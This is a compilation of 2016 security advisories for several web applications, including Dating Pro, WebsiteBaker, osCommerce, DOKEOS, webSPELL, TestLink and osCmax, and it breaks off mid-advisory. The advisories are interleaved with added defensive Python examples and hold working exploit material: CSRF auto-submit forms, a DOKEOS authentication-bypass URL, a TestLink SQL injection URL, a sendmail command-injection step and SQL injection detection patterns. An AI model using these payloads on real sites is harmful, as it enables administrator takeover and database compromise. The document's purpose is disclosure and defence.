CVSSv3 Base Scores: 8.8 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H], 9.6 
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple Cross-Site Request 
Forgery (CSRF) vulnerabilities in the popular dating social network Dating Pro. 

A remote unauthenticated attacker can perform CSRF attacks to change the 
administrator’s credentials and execute arbitrary system commands. Successful 
exploitation of the vulnerability may allow an attacker to gain complete control 
over the vulnerable website, all its users and databases. 


1) CSRF in "/admin/ausers/index"

The vulnerability exists due to the absence of validation of the HTTP request 
origin in the "/admin/ausers/index" script. A remote unauthenticated attacker can 
create a specially crafted malicious web page with a CSRF exploit, trick a 
logged-in administrator into visiting the page, spoof the HTTP request as if it 
were coming from the legitimate user, and change the login, email address and 
password of the current website administrator. This means a total takeover of 
the website. 

A simple CSRF exploit below will change login, email and password to "admin", 
"ad...@mail.com" and "123456" respectively. 

To reproduce the vulnerability, just create an empty HTML file, paste the CSRF 
exploit code into it, log in to the website and open the file in your browser:


<form action="http://[host]/admin/ausers/index" method="post" name="main">
<!-- hidden input fields (new login, email and password) not preserved in this copy -->
</form>
<script>document.main.submit();</script>


Now you can log in as administrator using the above-mentioned credentials.


2) CSRF in /admin/notifications/settings/

The vulnerability exists due to the absence of validation of the HTTP request 
origin in the "/admin/notifications/settings/" script. A remote unauthenticated 
attacker can create a specially crafted malicious web page with a CSRF exploit, 
trick a logged-in administrator into visiting the page, spoof the HTTP request as 
if it were coming from the legitimate user, and execute arbitrary system commands 
with the privileges of the web server. 

A simple exploit below will replace the full path to the sendmail program with 
the system command "cp config.php config.txt", which copies the "config.php" 
file to "config.txt" and thereby makes its content publicly accessible:


<form action="http://[host]/admin/notifications/settings/" method="post" name="main">
<!-- hidden input fields (sendmail path and other settings) not preserved in this copy -->
</form>
<script>document.main.submit();</script>


The command will be executed the next time any email is sent by the vulnerable 
web application. 

It is also possible to trigger this event using the following CSRF exploit:


<form action="http://[host]/admin/notifications/settings/" method="post" name="main">
<!-- hidden input field (test-email trigger) not preserved in this copy -->
</form>
<script>document.main.submit();</script>
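Both Dating Pro issues above come down to one missing server-side check: the admin scripts act on any POST that carries the administrator's session cookie, so a form auto-submitted from a foreign page is indistinguishable from the real admin form. The same absent-origin-check pattern is what turns the later osCommerce, webSPELL, osCmax and mcart.xls issues in this digest into unauthenticated attacks. The following is an added example, not code from the advisory or from the Dating Pro product, showing the two complementary checks a state-changing handler should perform: an Origin/Referer comparison and a per-session synchronizer token. The site origin, the request dictionaries and the session store are constructed assumptions for the demonstration.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Origin of the site being protected. Assumption for this example; the advisory
# only gives the placeholder http://[host]/.
SITE_ORIGIN = "https://dating.example"

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def origin_of(url):
    """Reduce an Origin or Referer header value to scheme://host[:port], or None if malformed."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None          # also covers the literal "null" Origin some browsers send
    return f"{parts.scheme}://{parts.netloc}".lower()


def issue_csrf_token(session):
    """Create, once per session, the random token the site's own forms embed as a hidden field."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def check_state_changing_request(request, session):
    """Decide whether a request may change state.

    `request` is a constructed dict with keys "method", "headers" and "form";
    `session` is the server-side session matching the cookie the browser attached.
    Returns (allowed, reason).
    """
    if request["method"].upper() in SAFE_METHODS:
        return True, "safe method"

    headers = {k.lower(): v for k, v in request["headers"].items()}

    # Check 1: the browser reports where the request came from. A form auto-submitted
    # from an attacker's page carries the attacker's Origin (or Referer), not ours.
    source = headers.get("origin") or headers.get("referer")
    if source is None:
        return False, "no Origin or Referer header"
    source_origin = origin_of(source)
    if source_origin != SITE_ORIGIN.lower():
        return False, f"cross-origin request from {source_origin}"

    # Check 2: synchronizer token. A foreign page cannot read our token, so a forged
    # POST either omits it or carries a wrong one. Constant-time compare avoids timing leaks.
    expected = session.get("csrf_token")
    supplied = request["form"].get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or wrong CSRF token"

    return True, "ok"


def demo():
    """Constructed requests: one from the site's own form, one auto-submitted by a foreign page."""
    session = {}
    token = issue_csrf_token(session)
    legitimate = {
        "method": "POST",
        "headers": {"Origin": SITE_ORIGIN, "Cookie": "sid=abc123"},
        "form": {"csrf_token": token, "login": "admin"},
    }
    forged = {
        "method": "POST",
        "headers": {"Origin": "http://attacker.example", "Cookie": "sid=abc123"},
        "form": {"login": "admin"},      # the cookie rides along, the token does not
    }
    return (check_state_changing_request(legitimate, session),
            check_state_changing_request(forged, session))


if __name__ == "__main__":
    print(demo())
```

The origin check alone is not sufficient (some clients strip Referer, and an absent header has to be treated as a rejection, which breaks a few legitimate setups), and the token alone does not help if the token is leaked through another bug; doing both is cheap. Requests whose method is GET must never change state, otherwise the check is bypassed with a plain `<img src>`.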



---

Solution:

Update to Genie (2015.7) released after February 29, 2016.

---

References:

[1] High-Tech Bridge Advisory HTB23294 - 
https://www.htbridge.com/advisory/HTB23294 - Admin Password Reset & RCE 
via CSRF in Dating Pro
[2] Dating Pro - http://www.datingpro.com - Everything you need to start and 
run a dating business.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by 
High-Tech Bridge for on-demand and continuous web application security, 
vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL 
implementation for PCI DSS and NIST compliance. Supports all types of protocols.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



SQL Injection and RCE in WebsiteBaker

2016-03-19 Thread High-Tech Bridge Security Research
Advisory ID: HTB23296
Product: WebsiteBaker
Vendor: WebsiteBaker Org e.V.
Vulnerable Version(s): 2.8.3-SP5 and probably prior
Tested Version: 2.8.3-SP5
Advisory Publication:  February 24, 2016  [without technical details]
Vendor Notification: February 24, 2016 
Vendor Patch: February 26, 2016 
Public Disclosure: March 18, 2016 
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: Critical 
CVSSv3 Base Score: 10 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a SQL injection vulnerability 
in WebsiteBaker CMS. A remote attacker will be able to read, write or modify 
arbitrary information in the database, gain complete control over the 
vulnerable web application and even the entire web server on which the 
application is hosted.

The vulnerability exists due to insufficient filtration of user-supplied data 
passed via the "language" HTTP POST parameter to the "/account/preferences.php" 
PHP script. A remote authenticated attacker (registration is open by default) 
can alter the present SQL query and inject and execute arbitrary SQL commands in 
the application’s database. 

Successful exploitation of vulnerability requires that the attacker is 
registered and authenticated, but the registration is open by default.

The following exploit code will assign administrative privileges to the 
attacker’s account. To reproduce the vulnerability, just log in to the website, 
copy the code below into an empty HTML file and then open it in your browser:


<form action="http://[host]/account/preferences.php" method="post" name="f1">
<!-- hidden input fields (including the "language" payload) not preserved in this copy -->
</form>
<script>document.f1.submit();</script>


We also draw your attention to the fact that a website administrator can edit 
the "intro.php" file and inject arbitrary PHP code into it using the following URL: 

http://[host]/admin/pages/intro.php

The injected code will be executed every time the user visits the following 
page:

http://[host]/pages/intro.php

Given these circumstances, successful exploitation of the SQL injection 
vulnerability will lead to Remote Code Execution and full compromise not just 
of the website, but of the entire web server and related environment. 
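The root cause described above is a user-controlled string ("language") spliced into the text of an UPDATE statement. As an added example, not code from the advisory or from WebsiteBaker, the block below shows the two layers a preferences handler should have: parameter binding, which makes the database treat the value as data no matter what it contains, and an allowlist, which is the natural check for a field whose legitimate values are a handful of locale codes. The schema, the group ids and the hostile input are constructed for the demonstration; sqlite3 stands in for MySQL.

```python
import sqlite3

# Locale codes the application actually ships. Constructed allowlist for this example.
SUPPORTED_LANGUAGES = {"EN", "DE", "FR"}


def make_db():
    """In-memory stand-in for a CMS user table (constructed; not WebsiteBaker's real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT, "
        "language TEXT, group_id INTEGER)"
    )
    # group_id 1 plays the role of the administrators group here
    conn.execute("INSERT INTO users VALUES (1, 'root', 'EN', 1)")
    conn.execute("INSERT INTO users VALUES (2, 'alice', 'EN', 2)")
    conn.commit()
    return conn


def get_user(conn, user_id):
    row = conn.execute(
        "SELECT username, language, group_id FROM users WHERE user_id = ?", (user_id,)
    ).fetchone()
    return {"username": row[0], "language": row[1], "group_id": row[2]}


def update_language_parameterized(conn, user_id, language):
    """Layer 1: bind the value instead of splicing it into the statement text.

    Whatever the string contains, the engine receives it as data for the
    `language` column; it is never parsed as SQL.
    """
    conn.execute("UPDATE users SET language = ? WHERE user_id = ?", (language, user_id))
    conn.commit()


def update_language(conn, user_id, language):
    """Layer 2: additionally reject anything that is not a known locale code.

    Binding alone already prevents injection; the allowlist keeps junk out of the
    column and fails loudly on input that no real client would ever send.
    """
    code = language.strip().upper()
    if code not in SUPPORTED_LANGUAGES:
        raise ValueError(f"unsupported language code: {language!r}")
    update_language_parameterized(conn, user_id, code)
    return code


def demo():
    """Constructed hostile input in the shape of a privilege-changing injection."""
    conn = make_db()
    hostile = "EN', group_id = 1 -- "
    update_language_parameterized(conn, 2, hostile)
    after_binding = get_user(conn, 2)      # language holds the literal text, group_id still 2
    try:
        update_language(conn, 2, hostile)
        rejected = False
    except ValueError:
        rejected = True
    update_language(conn, 2, "de")
    return after_binding, rejected, get_user(conn, 2)


if __name__ == "__main__":
    print(demo())
```

The interesting result is the first one: with binding, the whole hostile string ends up stored verbatim in the `language` column and `group_id` does not move, which is exactly the behaviour the string-built query in the advisory lacks.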


---

Solution:

Update to WebsiteBaker 2.8.3 SP6 RC3.0

More Information:
http://addon.websitebaker.org/pages/en/browse-add-ons.php?id=06C9F242

---

References:

[1] High-Tech Bridge Advisory HTB23296 - 
https://www.htbridge.com/advisory/HTB23296  - SQL Injection and RCE in 
WebsiteBaker
[2] WebsiteBaker - http://websitebaker.org - WebsiteBaker helps you to create 
the website you want: A free, easy and secure, flexible and extensible open 
source content management system (CMS).
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by 
High-Tech Bridge for on-demand and continuous web application security, 
vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL 
implementation for PCI DSS and NIST compliance. Supports all types of protocols.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



RCE via CSRF in osCommerce

2016-02-18 Thread High-Tech Bridge Security Research
Advisory ID: HTB23284
Product: osCommerce
Vendor: osCommerce
Vulnerable Version(s): 2.3.4 and probably prior
Tested Version: 2.3.4
Advisory Publication:  December 21, 2015  [without technical details]
Vendor Notification: December 21, 2015 
Public Disclosure: February 17, 2016 
Vulnerability Type: PHP File Inclusion [CWE-98]
Risk Level: Medium 
CVSSv3 Base Score: 5.8 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L]
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in the popular 
e-commerce software osCommerce, which has 280,000 store owners (according to the 
vendor). The vulnerability can be exploited to execute arbitrary PHP code on 
the remote system, compromise the vulnerable web application, its database and 
even the web server and related environment. 

Successful exploitation of the vulnerability requires the attacker to have access 
to the administrative panel; however, it can also be successfully exploited by a 
remote non-authenticated attacker via a CSRF vector, to which the application is 
also vulnerable. 

The vulnerability exists due to insufficient filtration of the "directory" HTTP 
POST parameter passed to the "/admin/languages.php" PHP script. A remote attacker 
can use path traversal sequences (e.g. "../../") to include and execute an 
arbitrary PHP file from the local server file system. 

A simple CSRF exploit below will update the application database and insert the 
"/tmp/file" string into the web application configuration:


<form action="http://[HOST]/admin/languages.php?action=insert" method="post" name="main">
<!-- hidden input fields (including the "directory" value) not preserved in this copy -->
</form>
<script>document.main.submit();</script>


Then, in order to execute the PHP code from "/tmp/file" file, just open the 
following URL: 
http://[host]/index.php?language=vu

---

Solution:

Disclosure timeline:
2015-12-21 Vendor notified via emails, no reply.
2016-01-06 Vendor notified via emails and forum, no reply.
2016-01-13 Fix Requested via emails, no reply.
2016-01-19 Fix Requested via emails, no reply.
2016-02-17 Public disclosure.

Currently we are not aware of any official solution for this vulnerability.

---

References:

[1] High-Tech Bridge Advisory HTB23284 - 
https://www.htbridge.com/advisory/HTB23284 - RCE via CSRF in osCommerce
[2] osCommerce - http://www.oscommerce.com/ - osCommerce Online Merchant is a 
complete self-hosted online store solution that contains both a catalog 
frontend and an administration tool backend which can be easily installed and 
configured through a web-based installation procedure.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by 
High-Tech Bridge for on-demand and continuous web application security, 
vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL 
implementation for PCI DSS and NIST compliance. Supports all types of protocols.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



SSO Authentication Bypass and Website Takeover in DOKEOS

2016-02-18 Thread High-Tech Bridge Security Research
Advisory ID: HTB23289
Product: DOKEOS
Vendor: DOKEOS
Vulnerable Version(s): ce30 and probably prior
Tested Version: ce30
Advisory Publication:  January 7, 2016  [without technical details]
Vendor Notification: January 7, 2016 
Public Disclosure: February 17, 2016 
Vulnerability Type: Improper Authentication [CWE-287]
Risk Level: High 
CVSSv3 Base Score: 7.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a high-risk vulnerability in 
a popular e-learning software DOKEOS. A remote unauthenticated attacker can 
bypass authentication process and login to the vulnerable website with an 
arbitrary account (including administrator's one). Successful exploitation 
requires Single Sign-On (SSO) authentication to be enabled.

The vulnerability is caused by a variable type confusion error when comparing 
the password hash to an unserialized string during the authentication process, 
when SSO authentication is enabled (sso_authentication=true). In this case, the 
application uses the HTTP GET "sso_cookie" parameter to pass the base64-encoded 
login and password and then calls the 'unserialize()' PHP function on the 
received data. 

Below is an example of vulnerable code, which erroneously uses the "==" 
operator to compare two strings (instead of the "===" operator):

if ($sso['secret'] == sha1($uData['password']) && ($sso['username'] == 
$uData['username'])) {


In this case, the SHA1 password hash is compared to the $sso['secret'] string, 
which is controlled by the attacker. If the attacker passes Boolean true instead 
of the real password, he can bypass the authentication and log in under an 
arbitrary web application account. 

A simple exploit below can be used to authenticate under "admin" account:

http://[host]/index.php?loginFailed=1_referer=_cookie=YToyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30=


The "YToyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30=" 
string is translated from base64 into: 

a:2:{s:8:"username";s:5:"admin";s:6:"secret";b:1;}


After the execution of the 'unserialize()' function, we have the following array:

$sso['username'] = 'admin';
$sso['secret'] = true;
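The bug is easiest to see by actually decoding the advisory's cookie and running both comparisons side by side. The block below is an added example, not DOKEOS code: a small decoder for the subset of PHP's serialize() format that appears on this page (strings, integers, booleans, null and arrays), an emulation of the single PHP 5 loose-comparison rule that matters here (a boolean on either side of "==" compares truthiness), and the strict check that closes the hole: both fields must be strings, and the secret is compared in constant time. The user record is constructed; the hash scheme (secret equals sha1 of the stored password) mirrors the page's snippet and is not a recommendation.

```python
import base64
import hashlib
import hmac


def php_unserialize(data, pos=0):
    """Decode a subset of PHP serialize() output: s, i, b, N and a (array).

    Returns (value, position after the value). Written for this example; it is not
    PHP's unserialize() and it rejects object (O:) payloads outright.
    """
    t = data[pos]
    if t == "N":                                   # N;
        return None, pos + 2
    if t in ("b", "i"):                            # b:1;  i:42;
        end = data.index(";", pos)
        raw = data[pos + 2:end]
        return (raw == "1", end + 1) if t == "b" else (int(raw), end + 1)
    if t == "s":                                   # s:5:"admin";  (length is in bytes)
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                          # skip :"
        value = data[start:start + length]
        if data[start + length:start + length + 2] != '";':
            raise ValueError(f"bad string terminator at {start + length}")
        return value, start + length + 2
    if t == "a":                                   # a:2:{key;value;...}
        colon = data.index(":", pos + 2)
        count = int(data[pos + 2:colon])
        p = colon + 2                              # skip :{
        result = {}
        for _ in range(count):
            key, p = php_unserialize(data, p)
            val, p = php_unserialize(data, p)
            result[key] = val
        if data[p] != "}":
            raise ValueError(f"bad array terminator at {p}")
        return result, p + 1
    raise ValueError(f"unsupported type {t!r} at {pos}")


def decode_sso_cookie(b64):
    """The advisory's flow: base64 -> PHP-serialized array -> dict (latin-1 keeps byte lengths)."""
    value, _ = php_unserialize(base64.b64decode(b64).decode("latin-1"))
    return value


def php_truthy(v):
    """PHP's truthiness: "" and "0" are false, every other string is true."""
    if isinstance(v, str):
        return v not in ("", "0")
    return bool(v)


def php_loose_equals(a, b):
    """Emulates only the PHP '==' rule that matters here: a bool on either side compares truthiness."""
    if isinstance(a, bool) or isinstance(b, bool):
        return php_truthy(a) == php_truthy(b)
    return a == b


def sso_secret_for(user):
    """What the page's scheme expects in 'secret': sha1 of the stored password (constructed)."""
    return hashlib.sha1(user["password"].encode()).hexdigest()


def sso_login_loose(sso, user):
    """Mirror of the vulnerable comparison: secret == sha1(password) with PHP '=='."""
    return (php_loose_equals(sso.get("secret"), sso_secret_for(user))
            and php_loose_equals(sso.get("username"), user["username"]))


def sso_login_strict(sso, user):
    """Fixed check: both fields must be strings, and the secret is compared in constant time."""
    secret, username = sso.get("secret"), sso.get("username")
    if not isinstance(secret, str) or not isinstance(username, str):
        return False
    return (hmac.compare_digest(secret.encode(), sso_secret_for(user).encode())
            and username == user["username"])


# The advisory's payload, and a constructed user record to authenticate against.
ADVISORY_COOKIE = "YToyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30="
ADMIN = {"username": "admin", "password": "correct horse battery staple"}

if __name__ == "__main__":
    sso = decode_sso_cookie(ADVISORY_COOKIE)
    print(sso, sso_login_loose(sso, ADMIN), sso_login_strict(sso, ADMIN))
```

Two points worth taking from the run: the decoder returns a Python `True` for the `b:1;` field, so the type check alone stops the bypass before any comparison happens; and calling unserialize() on attacker-controlled input is a problem in its own right, which is why the decoder above refuses object payloads instead of trying to be faithful.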




---

Solution:

Disclosure timeline:
2016-01-07 Vendor notified via contact form, no reply.
2016-01-13 Vendor notified via contact form, emails and twitter, no reply.
2016-01-20 Vendor notified via contact form and emails, no reply.
2016-01-27 Fix Requested via contact form and emails, no reply.
2016-02-03 Fix Requested via contact form and emails, no reply.
2016-02-17 Public disclosure.

Currently we are not aware of any official solution for this vulnerability.

---

References:

[1] High-Tech Bridge Advisory HTB23289 - 
https://www.htbridge.com/advisory/HTB23289 - SSO Auth Bypass and Website 
Takeover in DOKEOS
[2] DOKEOS - http://www.dokeos.com/ - E-LEARNING suite and LMS for growing 
companies
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by 
High-Tech Bridge for on-demand and continuous web application security, 
vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL 
implementation for PCI DSS and NIST compliance. Supports all types of protocols.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



SQL Injection in webSPELL

2016-02-18 Thread High-Tech Bridge Security Research
Advisory ID: HTB23291
Product: webSPELL
Vendor: webSPELL.org
Vulnerable Version(s): 4.2.4 and probably prior
Tested Version: 4.2.4
Advisory Publication:  January 22, 2016  [without technical details]
Vendor Notification: January 22, 2016 
Vendor Patch: February 12, 2016 
Public Disclosure: February 17, 2016 
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: Medium 
CVSSv3 Base Score: 6.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered two vulnerabilities in a 
popular CMS webSPELL developed for the needs of esport related communities. The 
vulnerability allows a remote authenticated attacker with cashbox access 
privileges to execute arbitrary SQL commands in the application’s database and 
completely compromise the vulnerable website. This vulnerability can also be 
exploited by a non-authenticated and unprivileged attacker via the CSRF vector, 
to which the system is also prone. 

The vulnerability exists due to insufficient filtration of user-supplied data 
passed via "payid" HTTP POST parameter to "/cash_box.php" script. A remote 
authenticated attacker, with cashbox access privileges, can alter the present 
SQL query and execute arbitrary SQL commands in application’s database. 

A simple exploit below uses a time-based SQL injection technique to determine 
the current version of the MySQL server. The page will be loaded with some delay 
if the current MySQL server version is 5.x:


<form action="http://[host]/cash_box.php" method="post" name="main">
<!-- hidden input fields (including the "payid" payload) not preserved in this copy -->
</form>

This vulnerability can be also exploited via CSRF vector, as the 
"/cash_box.php" script does not validate origin of HTTP request before 
processing user-supplied data in SQL query.


---

Solution:

Update to webSPELL 4.2.5

More Information:
https://github.com/webSPELL/webSPELL/issues/309

---

References:

[1] High-Tech Bridge Advisory HTB23291 - 
https://www.htbridge.com/advisory/HTB23291 - SQL Injection in webSPELL
[2] webSPELL - https://www.webspell.org/ - webSPELL is a free content 
management system under GNU GPL for creating websites easily
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by 
High-Tech Bridge for on-demand and continuous web application security, 
vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL 
implementation for PCI DSS and NIST compliance. Supports all types of protocols.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



SQL Injection in TestLink

2016-02-18 Thread High-Tech Bridge Security Research
Advisory ID: HTB23288
Product: TestLink
Vendor: TestLink Development Team
Vulnerable Version(s): 1.9.14 and probably prior
Tested Version: 1.9.14
Advisory Publication:  January 7, 2016  [without technical details]
Vendor Notification: January 7, 2016 
Vendor Patch: January 9, 2016 
Public Disclosure: February 17, 2016 
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: High 
CVSSv3 Base Score: 7.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a high-risk SQL injection 
vulnerability in TestLink Open Source Test Management. The vulnerability can be 
exploited to alter the present SQL query and gain access to potentially 
sensitive information or even to completely compromise the vulnerable web 
application.

The vulnerability is caused by insufficient filtration of the "apikey" HTTP GET 
parameter passed to the "lnl.php" PHP script. A remote unauthenticated attacker 
can inject and execute arbitrary SQL commands in the application's database.

A simple exploit code below will disclose the version of the MySQL server in use:

http://[host]/lnl.php?apikey=123999%27%20OR%201=%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,%201,0%29%29%20--%202
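Because the TestLink issue is reachable without authentication through a GET parameter, the probe above lands in the web server's access log in percent-encoded form, and the same goes for the version-fingerprinting and time-based (SLEEP/BENCHMARK) probes of the kind the webSPELL advisory describes. The block below is an added example, not part of either advisory or of the products: it parses Common Log Format lines, percent-decodes each query-string value twice (to catch double encoding), and flags values that match a small set of injection indicators. The sample log lines are constructed; the first one reuses the payload shape shown on this page.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Indicators of SQL injection probing in decoded query-string values. Each entry is
# (regex, label). Constructed for this example; tune before production use.
SQLI_INDICATORS = [
    (r"\bsleep\s*\(", "time-based: SLEEP()"),
    (r"\bbenchmark\s*\(", "time-based: BENCHMARK()"),
    (r"\bversion\s*\(\s*\)", "fingerprinting: version()"),
    (r"\bunion\s+(all\s+)?select\b", "UNION SELECT"),
    (r"'\s*(or|and)\s+\S+\s*=\s*\S+", "tautology after quote"),
    (r"'\s*(--|#)", "quote followed by comment"),
    (r"\bif\s*\(\s*mid\s*\(", "conditional substring probe"),
]

# Common Log Format with the request line split into method, path and protocol.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def decoded_params(path):
    """Yield (name, value) pairs from the query string, percent-decoded twice.

    parse_qsl decodes once; the second unquote catches double-encoded probes
    such as %2527 standing for a single quote.
    """
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        yield name, unquote_plus(value)


def indicators_in(value):
    """Labels of every indicator pattern that matches the decoded value."""
    return [label for pattern, label in SQLI_INDICATORS
            if re.search(pattern, value, re.IGNORECASE)]


def scan_log(lines):
    """Return one finding per (request, parameter) whose value matches an indicator."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        for name, value in decoded_params(m.group("path")):
            hits = indicators_in(value)
            if hits:
                findings.append({"ip": m.group("ip"),
                                 "path": urlsplit(m.group("path")).path,
                                 "param": name, "indicators": hits, "value": value})
    return findings


# Constructed sample log: the advisory's payload shape against lnl.php, a time-based
# probe, a POST whose body the access log never records, and a benign request.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Feb/2016:10:00:00 +0000] "GET /lnl.php?apikey=123999%27%20OR%201=%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,%201,0%29%29%20--%202 HTTP/1.1" 200 512',
    '203.0.113.5 - - [17/Feb/2016:10:00:04 +0000] "GET /index.php?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 10',
    '198.51.100.7 - - [17/Feb/2016:10:00:05 +0000] "POST /cash_box.php HTTP/1.1" 200 88',
    '192.0.2.9 - - [17/Feb/2016:10:00:09 +0000] "GET /lnl.php?apikey=abc123 HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The third sample line is the caveat: injection through a POST body, which is how the webSPELL "payid" parameter is reached, leaves no trace of the payload in a standard access log. Catching that class needs request-body logging at the application or reverse-proxy layer, or database-side query logging, not a better regex.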


---

Solution:

Update to TestLink 1.9.15

More Information:
http://mantis.testlink.org/view.php?id=7402

---

References:

[1] High-Tech Bridge Advisory HTB23288 - 
https://www.htbridge.com/advisory/HTB23288 - SQL Injection in TestLink
[2] TestLink - http://testlink.org/ - TestLink Open Source Test Management
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by 
High-Tech Bridge for on-demand and continuous web application security, 
vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL 
implementation for PCI DSS and NIST compliance. Supports all types of protocols.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



RCE via CSRF in osCmax

2016-02-18 Thread High-Tech Bridge Security Research
Advisory ID: HTB23285
Product: osCmax
Vendor: http://oscmax.com/
Vulnerable Version(s): 2.5.4 and probably prior
Tested Version: 2.5.4
Advisory Publication:  December 21, 2015  [without technical details]
Vendor Notification: December 21, 2015 
Public Disclosure: February 17, 2016 
Vulnerability Type: PHP File Inclusion [CWE-98]
Risk Level: Medium 
CVSSv3 Base Score: 5.8 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L]
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered 2 PHP Local File Inclusion 
vulnerabilities in osCmax, a popular web-based e-commerce application and 
shopping cart. The vulnerabilities can be exploited to execute arbitrary PHP 
code on the target system. 

Successful exploitation of these vulnerabilities requires the attacker to have 
access to the administrator panel. However, both vulnerabilities can also be 
